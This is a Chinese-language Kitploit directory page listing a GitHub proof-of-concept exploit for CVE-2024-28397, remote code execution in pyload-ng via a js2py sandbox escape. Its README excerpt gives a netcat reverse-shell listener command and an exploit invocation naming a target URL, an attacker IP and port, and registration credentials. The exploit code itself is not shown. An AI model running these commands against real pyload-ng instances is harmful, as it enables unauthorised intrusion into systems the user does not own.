Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Remote-Code-Execution-CVE-2024-28397-pyload-ng-js2py- — 针对 CVE-2024-28397 的 PoC 漏洞利用 – 通过 js2py 沙箱逃逸在 pyload-ng 中实现远程代码执行 | Kitploit
工具/GitHubGitHub/udayveer17/remote-code-execution-cve-2024-28397-pyload-ng-js2py-
漏洞分析漏洞利用Web应用程序漏洞利用
GitHubudayveer17/remote-code-execution-cve-2024-28397-pyload-ng-js2py-

Remote-Code-Execution-CVE-2024-28397-pyload-ng-js2py-

针对 CVE-2024-28397 的 PoC 漏洞利用 – 通过 js2py 沙箱逃逸在 pyload-ng 中实现远程代码执行

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
1个月前尚未审核
分享

远程代码执行 – CVE-2024-28397 (pyload-ng / js2py)

本仓库包含针对 CVE-2024-28397 的概念验证(PoC) 利用代码,该漏洞是 pyload-ng 因不安全使用 js2py 而导致的远程代码执行漏洞。

免责声明:
此 PoC 仅用于教育和研究目的。
请勿在非您所有或未经明确授权测试的系统上使用。
作者对任何滥用此代码的行为概不负责。


漏洞详情

  • CVE ID: CVE-2024-28397
  • 组件: pyload-ng 中的 js2py
  • 影响: 远程代码执行(RCE)
  • 攻击向量: 恶意 JS 载荷逃逸 js2py 沙箱并执行任意系统命令。

环境要求与配置

你需要 Python 3.x、requests 库,以及用于接收反弹 Shell 的 netcat。

  • 目标 → 可访问 /run_code 接口的存在漏洞的 pyload-ng 实例

监听器 → 在运行利用代码前启动:

nc -lvnp 4444

使用方法:

python3 exploit.py -url http://target.com -lhost YOUR_IP -lport 4444 -user attacker -passwd attacker123

示例输出:

  • [+] 注册成功!
  • [+] 登录成功
  • [+] 漏洞利用成功
下载工具